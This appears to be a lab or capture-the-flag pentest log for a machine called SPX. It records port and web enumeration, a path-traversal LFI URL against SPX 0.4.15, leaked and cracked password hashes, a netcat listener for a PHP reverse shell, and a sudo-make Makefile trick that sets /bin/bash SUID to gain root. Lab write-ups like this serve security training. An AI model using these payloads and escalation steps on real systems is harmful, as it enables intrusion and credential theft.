SPX
๐งช Pentest Log: {{date:2025-08-03}}
๐ Target Information
- Machine Name: SPX
- IP Address: 192.168.223.108
- Operating System: Linux
ip=192.168.223.108
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
found phpinfo.php page, and found SPX is installed
SPX 0.4.15
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: LFI
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
http://$ip/index.php/?SPX_KEY=a2a90ca2f9f0ea04d267b16fb8e63800&SPX_UI_URI=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fwww%2fhtml%2findex.php
obtained password hashes
admin:$2y$10$7LaMUa8an8NrvnQsj5xZ3eDdOejgLyXE8IIvsC.hFy1dg7rPb9cqG
user:$2y$10$x8PS6i0Sji2Pglyz7SLFruYFpAsz9XAYsdiPyfse6QDkB/QsdShxi
crack password hashes
admin:lowprofile
user:profiler
login to the tiny filer manger and upload a php reverse shell
nc -lvnp 80
Reuse the admin password to swtich to profiler user
su profiler
๐งฌ Privilege Escalation
๐ค Current Access
- User: profiler
- Groups: profiler
- Shell Type: webshell
๐ Enumeration
Sudo:
sudo -l
found
User profiler may run the following commands on spx:
(ALL) /usr/bin/make install -C /home/profiler/php-spx
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Sudo Misconfiguration
- Target Binary/Service: make
- Reference / Source: N/A
๐ง Exploit Steps
- Setup
cd ~/php-spx
rm Makefile
vim Makefile
all:
@echo "Do nothing in all"
install:
chmod u+s /bin/bash
- Smash to root
sudo /usr/bin/make install -C /home/profiler/php-spx
bash -p